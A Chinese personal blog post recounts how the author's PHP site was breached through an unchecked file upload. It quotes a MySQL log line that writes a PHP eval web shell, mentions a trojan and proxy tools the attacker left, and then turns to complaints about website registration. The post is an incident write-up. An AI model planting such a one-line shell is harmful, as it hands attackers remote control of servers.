一些计算机零碎知识随写(25年1月)-1

我原以为世界上有技术的那批人不会那么闲,我错了,被脚本真实了。

今天正隔着画画呢,手机突然弹出几条安全告警通知。

急忙打开服务器,发现问题不简单,直接关服务器重装系统.....

首先,不要认为小网站,没什么人看就不做防护

互联网不缺乏脚本小子和没啥事喜欢攻击的黑客(在这个时代也不是没有可能是恶意的流窜ai),不要向我一样,认为这个网站没什么人看,什么保护也不加,等到被爆破了才急忙修改,要是生产环境被这么搞一下那就很坏了。(各种意义上的)

因为我是php写的网站,php的漏洞很多是历史遗留问题了,没有很好的代码规范的话那很容易被入侵。

就比如我没有加入文件验证之类的(我当时的想法:不会有人这么闲吧)。

我的思考

php这个语言漏洞太多,对于我来说要么以后补课网络安全php这方面的课程,要么趁早换一门语言。

那名坏笔到底在我服务器干了什么呢?

事情已经发生了,气急败坏不如冷静分析。

首先是恶意上传一个php文件,然后查询了我所有的数据库文件

具体的代码如下

php 复制代码
C:\MySQL\bin\mysqld.exe, Version: 5.5.53 (MySQL Community Server (GPL)). started with:
TCP Port: 3306, Named Pipe: MySQL
Time                 Id Command    Argument
		   60 Query	select'<?php eval($_POST[admin]);?>'
		   60 Quit

那很坏了

eval 函数在这种情况下如果被成功执行,明显是具有恶意企图的,可能会导致服务器被攻击者远程控制、执行任意命令等安全风险。

第二个是一个木马病毒

太坏了

根据计算机病毒百科来看这玩意是近几年的开发的病毒。

可能会修改系统的关键文件,造成系统崩溃或无法正常启动。

它可以监控用户的计算机操作,并窃取敏感信息,如银行账户密码、个人隐私等。

所以说病毒什么乱七八糟并不是少了,而是坏笔们不直接打普通电脑了。

最终它干了什么

看样子是想把我服务器当作代理(?不确定。从它后面安装的内网穿透工具和代理工具来看是这样的。

然后正上厕所呢,公安给我打电话来了。

公安备案失败

之前icp备案根据腾讯云的提示操作起来没有过于麻烦,就是写写表(个人是这样,企业的话多一些步骤。)

然后icp过完审核居然还要公安部审核,就不能一起审核吗,真是徒增开发者的麻烦呢。

个人的网站icp备案和公安的表几乎没有什么差别,所以真的很难理解呢!

然后就打电话告诉我说不受理,去自己的户籍地办理去(icp是常驻地)

emm...???

感叹一些地方上的办事效率差,效率低了。

所以你以为我要告诉你个人开发者地址填写的时候要写户籍地icp写常驻地吗?

不啊我的朋友,个人博客要就不申请域名要不就一步到位买国外的好啦!就不用这么多麻烦的手续啦!

相关推荐
遇码36 分钟前
开源 Data Agent 实战:用 Lakemind + DuckDB 让 LLM 安全分析本地数据
安全·开源
Chengbei1144 分钟前
VMware Workstation Pro 26H1免费虚拟化利器
运维·安全·web安全·自动化·系统安全·apache·安全架构
AI创界者1 小时前
打造内网安全防线:使用 Kali Linux 进行企业级漏洞风险自查与防御指南
linux·运维·安全
@insist12311 小时前
系统规划与管理师-信息安全规划核心考点解析:概述与安全架构
安全·软考·安全架构·系统规划与管理师·软件水平考试·系统规划与管理工程师
IT小白杨11 小时前
从移动指纹到App隔离:TikTok Shop跨境电商账号安全管理实战
安全·新媒体运营·业界资讯·指纹浏览器
humors22112 小时前
【分享】火绒恶意网址自定义规则,根据互联网应急中心部分威胁预警恶意代码制作
网络·安全·规则·火绒安全·恶意网址·应急中心
工程管理笔记13 小时前
工程发票与资金管理系统:蓝燕云进销项发票台账功能
安全
爱折腾的小黑牛16 小时前
礼账小程序的数据安全方案:加密与备份
数据库·安全
云水一下18 小时前
DVWA从入门到精通(十八):Cryptography(密码学问题)
web安全·密码学·dvwa
humors22118 小时前
【转帖】安全企业发布iOS漏洞攻击风险检测工具
安全·ios·手机·苹果